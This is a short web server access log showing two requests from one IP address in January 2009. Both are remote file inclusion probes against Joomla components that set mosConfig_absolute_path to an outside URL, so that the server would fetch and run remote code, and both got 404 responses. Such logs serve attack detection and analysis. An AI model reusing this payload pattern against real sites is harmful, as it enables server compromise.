89.111.180.85 - - [06/Jan/2009:08:34:09 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:10 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
